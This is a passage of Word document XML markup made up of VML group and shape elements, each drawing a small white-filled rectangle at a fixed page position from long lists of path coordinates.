3017,11910,3020,11910,3023,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11911,3026,11911,3026,11911,3026,11911,3026,11911,3026,11911,3026,11911,3026,11912,3026,11912,3026,11912,3026,11912,3026,11913,3026,11913,3026,11913,3026,11914,3026,11914,3026,11915,3026,11915,3026,11915,3026,11916,3026,11916,3026,11917,3026,11918,3026,11918,3026,11919,3026,11920,3026,11920,3026,11921,3026,11922,3026,11923,3026,11924,3026,11925,3026,11926,3026,11927,3026,11928,3026,11929,3026,11930,3026,11931,3026,11933,3026,11934,3026,11935,3026,11937,3026,11938,3026,11940,3026,11941,3026,11943,3026,11944,3026,11946,3026,11948,3026,11950,3026,11952,3026,11954,3026,11956,3026,11958,3026,11960,3026,11962,3026,11964,3026,11967,3026,11969,3026,11971,3026,11974,3026,11976,3026,11979,3026,11982,3026,11985,3026,11988,3026,11990,3026,11993,3026,11997,3026,12000,3026,12003,3026,12006,3026,12010,3026,12013,3026,12017,3026,12020,3026,12024,3026,12028,3026,12032,3026,12036,3026,12040,3026,12044,3026,12048,3026,12052,3026,12057,3026,12061,3026,12066,3026,12071,3026,12075,3026,12080,3026,12085,3026,12090,3026,12095,3026,12101,3026,12106,3026,12112,3026,12117,3026,12123,3026,12128,3026,12134,3026,12140,3026,12146,3026,12152,3026,12159,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3025,12165,3024,12165,3024,12165,3024,12165,3024,12165,3024,12165,3024,12165,3023,12165,3023,12165,3023,12165,3023,12165,3022,12165,3022,12165,3022,12165,3022,12165,3021,12165,3021,12165,3021,12165,3020,12165,3020,12165,3019,12165,3019,12165,3019,12165,3018,12165,3018,12165,3017,12165,3017,12165,3016,12165,3016,12165,3015,12165,3014,12165,3014,12165,3013,12165,3012,12165,3012,12165,3011,12165,3010,12165,3009,12165,3009,12165,3008,12165,3007,12165,3006,12165,3005,12165,3004,12165,3003,12165,3002,12165,3001,12165,3000,12165,2999,12165,2998,12165,2997,12165,2995,12165,2994,12165,2993,12165,2992,12165,2990,12165,2989,12165,2988,12165,2986,12165,2985,12165,2983,12165,2982,12165,2980,12165,2979,12165,2977,12165,2975,12165,2974,12165,2972,12165,2970,12165,2968,12165,2966,12165,2964,12165,2962,12165,2960,12165,2958,12165,2956,12165,2954,12165,2952,12165,2950,12165,2948,12165,2945,12165,2943,12165,2941,12165,2938,12165,2936,12165,2933,12165,2931,12165,2928,12165,2925,12165,2923,12165,2920,12165,2917,12165,2914,12165,2911,12165,2908,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12165,2905,12164,2905,12164,2905,12164,2905,12164,2905,12164,2905,12164,2905,12163,2905,12163,2905,12163,2905,12162,2905,12162,2905,12162,2905,12161,2905,12161,2905,12161,2905,12160,2905,12160,2905,12159,2905,12159,2905,12158,2905,12157,2905,12157,2905,12156,2905,12155,2905,12155,2905,12154,2905,12153,2905,12152,2905,12151,2905,12150,2905,12149,2905,12148,2905,12147,2905,12146,2905,12145,2905,12144,2905,12143,2905,12141,2905,12140,2905,12139,2905,12137,2905,12136,2905,12134,2905,12132,2905,12131,2905,12129,2905,12127,2905,12125,2905,12124,2905,12122,2905,12120,2905,12118,2905,12115,2905,12113,2905,12111,2905,12109,2905,12106,2905,12104,2905,12101,2905,12099,2905,12096,2905,12093,2905,12090,2905,12088,2905,12085,2905,12082,2905,12079,2905,12075,2905,12072,2905,12069,2905,12065,2905,12062,2905,12058,2905,12055,2905,12051,2905,12047,2905,12043,2905,12039,2905,12035,2905,12031,2905,12027,2905,12023,2905,12018,2905,12014,2905,12009,2905,12004,2905,12000,2905,11995,2905,11990,2905,11985,2905,11980,2905,11974,2905,11969,2905,11964,2905,11958,2905,11952,2905,11947,2905,11941,2905,11935,2905,11929,2905,11923,2905,11916,2905,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:11890;width:130;height:270" coordorigin="3010,11890" coordsize="130,270" path="m3026,11910l3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3026,11910,3027,11910,3027,11910,3027,11910,3027,11910,3027,11910,3027,11910,3027,11910,3028,11910,3028,11910,3028,11910,3028,11910,3029,11910,3029,11910,3029,11910,3029,11910,3030,11910,3030,11910,3030,11910,3031,11910,3031,11910,3032,11910,3032,11910,3032,11910,3033,11910,3033,11910,3034,11910,3034,11910,3035,11910,3036,11910,3036,11910,3037,11910,3037,11910,3038,11910,3039,11910,3039,11910,3040,11910,3041,11910,3042,11910,3043,11910,3043,11910,3044,11910,3045,11910,3046,11910,3047,11910,3048,11910,3049,11910,3050,11910,3051,11910,3052,11910,3053,11910,3054,11910,3056,11910,3057,11910,3058,11910,3059,11910,3061,11910,3062,11910,3063,11910,3065,11910,3066,11910,3068,11910,3069,11910,3071,11910,3072,11910,3074,11910,3076,11910,3077,11910,3079,11910,3081,11910,3083,11910,3085,11910,3087,11910,3089,11910,3091,11910,3093,11910,3095,11910,3097,11910,3099,11910,3101,11910,3103,11910,3106,11910,3108,11910,3110,11910,3113,11910,3115,11910,3118,11910,3120,11910,3123,11910,3126,11910,3128,11910,3131,11910,3134,11910,3137,11910,3140,11910,3143,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11911,3146,11911,3146,11911,3146,11911,3146,11911,3146,11911,3146,11911,3146,11912,3146,11912,3146,11912,3146,11912,3146,11913,3146,11913,3146,11913,3146,11914,3146,11914,3146,11915,3146,11915,3146,11915,3146,11916,3146,11916,3146,11917,3146,11918,3146,11918,3146,11919,3146,11920,3146,11920,3146,11921,3146,11922,3146,11923,3146,11924,3146,11925,3146,11926,3146,11927,3146,11928,3146,11929,3146,11930,3146,11931,3146,11933,3146,11934,3146,11935,3146,11937,3146,11938,3146,11940,3146,11941,3146,11943,3146,11944,3146,11946,3146,11948,3146,11950,3146,11952,3146,11954,3146,11956,3146,11958,3146,11960,3146,11962,3146,11964,3146,11967,3146,11969,3146,11971,3146,11974,3146,11976,3146,11979,3146,11982,3146,11985,3146,11988,3146,11990,3146,11993,3146,11997,3146,12000,3146,12003,3146,12006,3146,12010,3146,12013,3146,12017,3146,12020,3146,12024,3146,12028,3146,12032,3146,12036,3146,12040,3146,12044,3146,12048,3146,12052,3146,12057,3146,12061,3146,12066,3146,12071,3146,12075,3146,12080,3146,12085,3146,12090,3146,12095,3146,12101,3146,12106,3146,12112,3146,12117,3146,12123,3146,12128,3146,12134,3146,12140,3146,12146,3146,12152,3146,12159,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3145,12165,3144,12165,3144,12165,3144,12165,3144,12165,3144,12165,3144,12165,3143,12165,3143,12165,3143,12165,3143,12165,3143,12165,3142,12165,3142,12165,3142,12165,3141,12165,3141,12165,3141,12165,3140,12165,3140,12165,3140,12165,3139,12165,3139,12165,3138,12165,3138,12165,3137,12165,3137,12165,3136,12165,3136,12165,3135,12165,3134,12165,3134,12165,3133,12165,3132,12165,3132,12165,3131,12165,3130,12165,3129,12165,3129,12165,3128,12165,3127,12165,3126,12165,3125,12165,3124,12165,3123,12165,3122,12165,3121,12165,3120,12165,3119,12165,3118,12165,3117,12165,3116,12165,3114,12165,3113,12165,3112,12165,3110,12165,3109,12165,3108,12165,3106,12165,3105,12165,3103,12165,3102,12165,3100,12165,3099,12165,3097,12165,3095,12165,3094,12165,3092,12165,3090,12165,3088,12165,3086,12165,3084,12165,3083,12165,3081,12165,3079,12165,3076,12165,3074,12165,3072,12165,3070,12165,3068,12165,3065,12165,3063,12165,3061,12165,3058,12165,3056,12165,3053,12165,3051,12165,3048,12165,3045,12165,3043,12165,3040,12165,3037,12165,3034,12165,3031,12165,3029,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12165,3026,12164,3026,12164,3026,12164,3026,12164,3026,12164,3026,12164,3026,12163,3026,12163,3026,12163,3026,12162,3026,12162,3026,12162,3026,12161,3026,12161,3026,12161,3026,12160,3026,12160,3026,12159,3026,12159,3026,12158,3026,12157,3026,12157,3026,12156,3026,12155,3026,12155,3026,12154,3026,12153,3026,12152,3026,12151,3026,12150,3026,12149,3026,12148,3026,12147,3026,12146,3026,12145,3026,12144,3026,12143,3026,12141,3026,12140,3026,12139,3026,12137,3026,12136,3026,12134,3026,12132,3026,12131,3026,12129,3026,12127,3026,12125,3026,12124,3026,12122,3026,12120,3026,12118,3026,12115,3026,12113,3026,12111,3026,12109,3026,12106,3026,12104,3026,12101,3026,12099,3026,12096,3026,12093,3026,12090,3026,12088,3026,12085,3026,12082,3026,12079,3026,12075,3026,12072,3026,12069,3026,12065,3026,12062,3026,12058,3026,12055,3026,12051,3026,12047,3026,12043,3026,12039,3026,12035,3026,12031,3026,12027,3026,12023,3026,12018,3026,12014,3026,12009,3026,12004,3026,12000,3026,11995,3026,11990,3026,11985,3026,11980,3026,11974,3026,11969,3026,11964,3026,11958,3026,11952,3026,11947,3026,11941,3026,11935,3026,11929,3026,11923,3026,11916,3026,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:3130;top:11890;width:130;height:270" coordorigin="3130,11890" coordsize="130,270" path="m3146,11910l3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3146,11910,3147,11910,3147,11910,3147,11910,3147,11910,3147,11910,3147,11910,3148,11910,3148,11910,3148,11910,3148,11910,3148,11910,3149,11910,3149,11910,3149,11910,3149,11910,3150,11910,3150,11910,3150,11910,3151,11910,3151,11910,3152,11910,3152,11910,3153,11910,3153,11910,3153,11910,3154,11910,3154,11910,3155,11910,3156,11910,3156,11910,3157,11910,3157,11910,3158,11910,3159,11910,3159,11910,3160,11910,3161,11910,3162,11910,3163,11910,3163,11910,3164,11910,3165,11910,3166,11910,3167,11910,3168,11910,3169,11910,3170,11910,3171,11910,3172,11910,3173,11910,3174,11910,3176,11910,3177,11910,3178,11910,3179,11910,3181,11910,3182,11910,3183,11910,3185,11910,3186,11910,3188,11910,3189,11910,3191,11910,3192,11910,3194,11910,3196,11910,3198,11910,3199,11910,3201,11910,3203,11910,3205,11910,3207,11910,3209,11910,3211,11910,3213,11910,3215,11910,3217,11910,3219,11910,3221,11910,3223,11910,3226,11910,3228,11910,3230,11910,3233,11910,3235,11910,3238,11910,3240,11910,3243,11910,3246,11910,3248,11910,3251,11910,3254,11910,3257,11910,3260,11910,3263,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11911,3266,11911,3266,11911,3266,11911,3266,11911,3266,11911,3266,11911,3266,11912,3266,11912,3266,11912,3266,11912,3266,11913,3266,11913,3266,11913,3266,11914,3266,11914,3266,11915,3266,11915,3266,11915,3266,11916,3266,11916,3266,11917,3266,11918,3266,11918,3266,11919,3266,11920,3266,11920,3266,11921,3266,11922,3266,11923,3266,11924,3266,11925,3266,11926,3266,11927,3266,11928,3266,11929,3266,11930,3266,11931,3266,11933,3266,11934,3266,11935,3266,11937,3266,11938,3266,11940,3266,11941,3266,11943,3266,11944,3266,11946,3266,11948,3266,11950,3266,11952,3266,11954,3266,11956,3266,11958,3266,11960,3266,11962,3266,11964,3266,11967,3266,11969,3266,11971,3266,11974,3266,11976,3266,11979,3266,11982,3266,11985,3266,11988,3266,11990,3266,11993,3266,11997,3266,12000,3266,12003,3266,12006,3266,12010,3266,12013,3266,12017,3266,12020,3266,12024,3266,12028,3266,12032,3266,12036,3266,12040,3266,12044,3266,12048,3266,12052,3266,12057,3266,12061,3266,12066,3266,12071,3266,12075,3266,12080,3266,12085,3266,12090,3266,12095,3266,12101,3266,12106,3266,12112,3266,12117,3266,12123,3266,12128,3266,12134,3266,12140,3266,12146,3266,12152,3266,12159,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3265,12165,3264,12165,3264,12165,3264,12165,3264,12165,3264,12165,3264,12165,3263,12165,3263,12165,3263,12165,3263,12165,3262,12165,3262,12165,3262,12165,3261,12165,3261,12165,3261,12165,3260,12165,3260,12165,3260,12165,3259,12165,3259,12165,3258,12165,3258,12165,3257,12165,3257,12165,3256,12165,3256,12165,3255,12165,3254,12165,3254,12165,3253,12165,3252,12165,3252,12165,3251,12165,3250,12165,3249,12165,3249,12165,3248,12165,3247,12165,3246,12165,3245,12165,3244,12165,3243,12165,3242,12165,3241,12165,3240,12165,3239,12165,3238,12165,3237,12165,3236,12165,3234,12165,3233,12165,3232,12165,3231,12165,3229,12165,3228,12165,3226,12165,3225,12165,3223,12165,3222,12165,3220,12165,3219,12165,3217,12165,3215,12165,3214,12165,3212,12165,3210,12165,3208,12165,3206,12165,3205,12165,3203,12165,3201,12165,3199,12165,3197,12165,3194,12165,3192,12165,3190,12165,3188,12165,3186,12165,3183,12165,3181,12165,3178,12165,3176,12165,3173,12165,3171,12165,3168,12165,3166,12165,3163,12165,3160,12165,3157,12165,3154,12165,3152,12165,3149,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12165,3146,12164,3146,12164,3146,12164,3146,12164,3146,12164,3146,12164,3146,12163,3146,12163,3146,12163,3146,12162,3146,12162,3146,12162,3146,12161,3146,12161,3146,12161,3146,12160,3146,12160,3146,12159,3146,12159,3146,12158,3146,12157,3146,12157,3146,12156,3146,12155,3146,12155,3146,12154,3146,12153,3146,12152,3146,12151,3146,12150,3146,12149,3146,12148,3146,12147,3146,12146,3146,12145,3146,12144,3146,12143,3146,12141,3146,12140,3146,12139,3146,12137,3146,12136,3146,12134,3146,12132,3146,12131,3146,12129,3146,12127,3146,12125,3146,12124,3146,12122,3146,12120,3146,12118,3146,12115,3146,12113,3146,12111,3146,12109,3146,12106,3146,12104,3146,12101,3146,12099,3146,12096,3146,12093,3146,12090,3146,12088,3146,12085,3146,12082,3146,12079,3146,12075,3146,12072,3146,12069,3146,12065,3146,12062,3146,12058,3146,12055,3146,12051,3146,12047,3146,12043,3146,12039,3146,12035,3146,12031,3146,12027,3146,12023,3146,12018,3146,12014,3146,12009,3146,12004,3146,12000,3146,11995,3146,11990,3146,11985,3146,11980,3146,11974,3146,11969,3146,11964,3146,11958,3146,11952,3146,11947,3146,11941,3146,11935,3146,11929,3146,11923,3146,11916,3146,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:162.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3250,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:3250;top:11890;width:130;height:270" coordorigin="3250,11890" coordsize="130,270" path="m3266,11910l3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3266,11910,3267,11910,3267,11910,3267,11910,3267,11910,3267,11910,3267,11910,3267,11910,3268,11910,3268,11910,3268,11910,3268,11910,3268,11910,3269,11910,3269,11910,3269,11910,3270,11910,3270,11910,3270,11910,3271,11910,3271,11910,3271,11910,3272,11910,3272,11910,3273,11910,3273,11910,3274,11910,3274,11910,3275,11910,3275,11910,3276,11910,3276,11910,3277,11910,3277,11910,3278,11910,3279,11910,3280,11910,3280,11910,3281,11910,3282,11910,3283,11910,3283,11910,3284,11910,3285,11910,3286,11910,3287,11910,3288,11910,3289,11910,3290,11910,3291,11910,3292,11910,3293,11910,3295,11910,3296,11910,3297,11910,3298,11910,3299,11910,3301,11910,3302,11910,3304,11910,3305,11910,3306,11910,3308,11910,3309,11910,3311,11910,3313,11910,3314,11910,3316,11910,3318,11910,3319,11910,3321,11910,3323,11910,3325,11910,3327,11910,3329,11910,3331,11910,3333,11910,3335,11910,3337,11910,3339,11910,3341,11910,3343,11910,3346,11910,3348,11910,3350,11910,3353,11910,3355,11910,3358,11910,3360,11910,3363,11910,3366,11910,3368,11910,3371,11910,3374,11910,3377,11910,3380,11910,3383,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11911,3386,11911,3386,11911,3386,11911,3386,11911,3386,11911,3386,11911,3386,11912,3386,11912,3386,11912,3386,11912,3386,11913,3386,11913,3386,11913,3386,11914,3386,11914,3386,11915,3386,11915,3386,11915,3386,11916,3386,11916,3386,11917,3386,11918,3386,11918,3386,11919,3386,11920,3386,11920,3386,11921,3386,11922,3386,11923,3386,11924,3386,11925,3386,11926,3386,11927,3386,11928,3386,11929,3386,11930,3386,11931,3386,11933,3386,11934,3386,11935,3386,11937,3386,11938,3386,11940,3386,11941,3386,11943,3386,11944,3386,11946,3386,11948,3386,11950,3386,11952,3386,11954,3386,11956,3386,11958,3386,11960,3386,11962,3386,11964,3386,11967,3386,11969,3386,11971,3386,11974,3386,11976,3386,11979,3386,11982,3386,11985,3386,11988,3386,11990,3386,11993,3386,11997,3386,12000,3386,12003,3386,12006,3386,12010,3386,12013,3386,12017,3386,12020,3386,12024,3386,12028,3386,12032,3386,12036,3386,12040,3386,12044,3386,12048,3386,12052,3386,12057,3386,12061,3386,12066,3386,12071,3386,12075,3386,12080,3386,12085,3386,12090,3386,12095,3386,12101,3386,12106,3386,12112,3386,12117,3386,12123,3386,12128,3386,12134,3386,12140,3386,12146,3386,12152,3386,12159,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3385,12165,3384,12165,3384,12165,3384,12165,3384,12165,3384,12165,3384,12165,3383,12165,3383,12165,3383,12165,3383,12165,3382,12165,3382,12165,3382,12165,3381,12165,3381,12165,3381,12165,3380,12165,3380,12165,3380,12165,3379,12165,3379,12165,3378,12165,3378,12165,3377,12165,3377,12165,3376,12165,3376,12165,3375,12165,3374,12165,3374,12165,3373,12165,3373,12165,3372,12165,3371,12165,3370,12165,3370,12165,3369,12165,3368,12165,3367,12165,3366,12165,3365,12165,3364,12165,3363,12165,3362,12165,3361,12165,3360,12165,3359,12165,3358,12165,3357,12165,3356,12165,3354,12165,3353,12165,3352,12165,3351,12165,3349,12165,3348,12165,3346,12165,3345,12165,3343,12165,3342,12165,3340,12165,3339,12165,3337,12165,3335,12165,3334,12165,3332,12165,3330,12165,3328,12165,3327,12165,3325,12165,3323,12165,3321,12165,3319,12165,3317,12165,3314,12165,3312,12165,3310,12165,3308,12165,3306,12165,3303,12165,3301,12165,3298,12165,3296,12165,3293,12165,3291,12165,3288,12165,3286,12165,3283,12165,3280,12165,3277,12165,3274,12165,3272,12165,3269,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12165,3266,12164,3266,12164,3266,12164,3266,12164,3266,12164,3266,12164,3266,12163,3266,12163,3266,12163,3266,12162,3266,12162,3266,12162,3266,12161,3266,12161,3266,12161,3266,12160,3266,12160,3266,12159,3266,12159,3266,12158,3266,12157,3266,12157,3266,12156,3266,12155,3266,12155,3266,12154,3266,12153,3266,12152,3266,12151,3266,12150,3266,12149,3266,12148,3266,12147,3266,12146,3266,12145,3266,12144,3266,12143,3266,12141,3266,12140,3266,12139,3266,12137,3266,12136,3266,12134,3266,12132,3266,12131,3266,12129,3266,12127,3266,12125,3266,12124,3266,12122,3266,12120,3266,12118,3266,12115,3266,12113,3266,12111,3266,12109,3266,12106,3266,12104,3266,12101,3266,12099,3266,12096,3266,12093,3266,12090,3266,12088,3266,12085,3266,12082,3266,12079,3266,12075,3266,12072,3266,12069,3266,12065,3266,12062,3266,12058,3266,12055,3266,12051,3266,12047,3266,12043,3266,12039,3266,12035,3266,12031,3266,12027,3266,12023,3266,12018,3266,12014,3266,12009,3266,12004,3266,12000,3266,11995,3266,11990,3266,11985,3266,11980,3266,11974,3266,11969,3266,11964,3266,11958,3266,11952,3266,11947,3266,11941,3266,11935,3266,11929,3266,11923,3266,11916,3266,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:168.500pt;margin-top:594.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3370,11890" coordsize="130,270">
        <v:shape style="position:absolute;left:3370;top:11890;width:130;height:270" coordorigin="3370,11890" coordsize="130,270" path="m3386,11910l3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3386,11910,3387,11910,3387,11910,3387,11910,3387,11910,3387,11910,3387,11910,3387,11910,3388,11910,3388,11910,3388,11910,3388,11910,3389,11910,3389,11910,3389,11910,3389,11910,3390,11910,3390,11910,3390,11910,3391,11910,3391,11910,3391,11910,3392,11910,3392,11910,3393,11910,3393,11910,3394,11910,3394,11910,3395,11910,3395,11910,3396,11910,3396,11910,3397,11910,3398,11910,3398,11910,3399,11910,3400,11910,3400,11910,3401,11910,3402,11910,3403,11910,3404,11910,3404,11910,3405,11910,3406,11910,3407,11910,3408,11910,3409,11910,3410,11910,3411,11910,3412,11910,3413,11910,3415,11910,3416,11910,3417,11910,3418,11910,3420,11910,3421,11910,3422,11910,3424,11910,3425,11910,3426,11910,3428,11910,3429,11910,3431,11910,3433,11910,3434,11910,3436,11910,3438,11910,3439,11910,3441,11910,3443,11910,3445,11910,3447,11910,3449,11910,3451,11910,3453,11910,3455,11910,3457,11910,3459,11910,3461,11910,3464,11910,3466,11910,3468,11910,3471,11910,3473,11910,3475,11910,3478,11910,3481,11910,3483,11910,3486,11910,3489,11910,3491,11910,3494,11910,3497,11910,3500,11910,3503,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11910,3506,11911,3506,11911,3506,11911,3506,11911,3506,11911,3506,11911,3506,11911,3506,11912,3506,11912,3506,11912,3506,11912,3506,11913,3506,11913,3506,11913,3506,11914,3506,11914,3506,11915,3506,11915,3506,11915,3506,11916,3506,11916,3506,11917,3506,11918,3506,11918,3506,11919,3506,11920,3506,11920,3506,11921,3506,11922,3506,11923,3506,11924,3506,11925,3506,11926,3506,11927,3506,11928,3506,11929,3506,11930,3506,11931,3506,11933,3506,11934,3506,11935,3506,11937,3506,11938,3506,11940,3506,11941,3506,11943,3506,11944,3506,11946,3506,11948,3506,11950,3506,11952,3506,11954,3506,11956,3506,11958,3506,11960,3506,11962,3506,11964,3506,11967,3506,11969,3506,11971,3506,11974,3506,11976,3506,11979,3506,11982,3506,11985,3506,11988,3506,11990,3506,11993,3506,11997,3506,12000,3506,12003,3506,12006,3506,12010,3506,12013,3506,12017,3506,12020,3506,12024,3506,12028,3506,12032,3506,12036,3506,12040,3506,12044,3506,12048,3506,12052,3506,12057,3506,12061,3506,12066,3506,12071,3506,12075,3506,12080,3506,12085,3506,12090,3506,12095,3506,12101,3506,12106,3506,12112,3506,12117,3506,12123,3506,12128,3506,12134,3506,12140,3506,12146,3506,12152,3506,12159,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3506,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3505,12165,3504,12165,3504,12165,3504,12165,3504,12165,3504,12165,3503,12165,3503,12165,3503,12165,3503,12165,3502,12165,3502,12165,3502,12165,3502,12165,3501,12165,3501,12165,3500,12165,3500,12165,3500,12165,3499,12165,3499,12165,3498,12165,3498,12165,3497,12165,3497,12165,3496,12165,3496,12165,3495,12165,3495,12165,3494,12165,3493,12165,3493,12165,3492,12165,3491,12165,3490,12165,3490,12165,3489,12165,3488,12165,3487,12165,3486,12165,3485,12165,3484,12165,3483,12165,3482,12165,3481,12165,3480,12165,3479,12165,3478,12165,3477,12165,3476,12165,3474,12165,3473,12165,3472,12165,3471,12165,3469,12165,3468,12165,3466,12165,3465,12165,3464,12165,3462,12165,3460,12165,3459,12165,3457,12165,3456,12165,3454,12165,3452,12165,3450,12165,3448,12165,3447,12165,3445,12165,3443,12165,3441,12165,3439,12165,3437,12165,3435,12165,3432,12165,3430,12165,3428,12165,3426,12165,3423,12165,3421,12165,3418,12165,3416,12165,3413,12165,3411,12165,3408,12165,3406,12165,3403,12165,3400,12165,3397,12165,3395,12165,3392,12165,3389,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12165,3386,12164,3386,12164,3386,12164,3386,12164,3386,12164,3386,12164,3386,12163,3386,12163,3386,12163,3386,12162,3386,12162,3386,12162,3386,12161,3386,12161,3386,12161,3386,12160,3386,12160,3386,12159,3386,12159,3386,12158,3386,12157,3386,12157,3386,12156,3386,12155,3386,12155,3386,12154,3386,12153,3386,12152,3386,12151,3386,12150,3386,12149,3386,12148,3386,12147,3386,12146,3386,12145,3386,12144,3386,12143,3386,12141,3386,12140,3386,12139,3386,12137,3386,12136,3386,12134,3386,12132,3386,12131,3386,12129,3386,12127,3386,12125,3386,12124,3386,12122,3386,12120,3386,12118,3386,12115,3386,12113,3386,12111,3386,12109,3386,12106,3386,12104,3386,12101,3386,12099,3386,12096,3386,12093,3386,12090,3386,12088,3386,12085,3386,12082,3386,12079,3386,12075,3386,12072,3386,12069,3386,12065,3386,12062,3386,12058,3386,12055,3386,12051,3386,12047,3386,12043,3386,12039,3386,12035,3386,12031,3386,12027,3386,12023,3386,12018,3386,12014,3386,12009,3386,12004,3386,12000,3386,11995,3386,11990,3386,11985,3386,11980,3386,11974,3386,11969,3386,11964,3386,11958,3386,11952,3386,11947,3386,11941,3386,11935,3386,11929,3386,11923,3386,11916,3386,11910e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:216.500pt;margin-top:613.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4330,12270" coordsize="130,270">
